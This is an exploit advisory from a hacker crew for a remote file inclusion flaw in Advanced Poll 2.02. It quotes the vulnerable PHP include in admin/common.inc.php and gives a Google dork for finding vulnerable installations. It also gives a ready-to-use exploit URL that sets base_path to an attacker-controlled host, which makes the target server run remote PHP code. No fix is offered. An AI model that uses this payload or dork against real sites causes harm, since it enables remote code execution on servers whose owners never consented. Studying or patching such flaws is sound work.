#############################SolpotCrew Community################################ =0D
# =0D
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion =0D
# =0D
# Vendor site : http://www.proxy2.de/scripts.php =0D 
# =0D
################################################################################# =0D
# =0D
# =0D
# Bug Found By :Solpot a.k.a (k. Hasibuan) =0D
# =0D
# contact: chris_hasibuan@yahoo.com =0D 
# =0D
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt=0D 
# =0D
################################################################################ =0D
# =0D
# =0D
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , =0D
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy=0D
# home_edition2001 , Rendy ,Tje , m3lky , no-profile=0D
# and all crew #mardongan @ irc.dal.net =0D
# =0D
# =0D
############################################################################### =0D
Input passed to the "base_path" is not properly verified =0D
before being used to include files. This can be exploited to execute =0D
arbitrary PHP code by including files from local or external resources. =0D
=0D
code from /admin/common.inc.php =0D
=0D
$pollvars['SELF'] = basename($PHP_SELF); =0D
if (file_exists("$base_path/lang/$pollvars[lang]")) { =0D
include ("$base_path/lang/$pollvars[lang]"); =0D
} else { =0D
include ("$base_path/lang/english.php"); =0D
=0D
google dork : inurl:comments.php?action= send id =0D
=0D
EXPLOIT : =0D
=0D
http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker =0D 
=0D
##############################MY LOVE JUST FOR U RIE######################### =0D
######################################E.O.F##################################=0D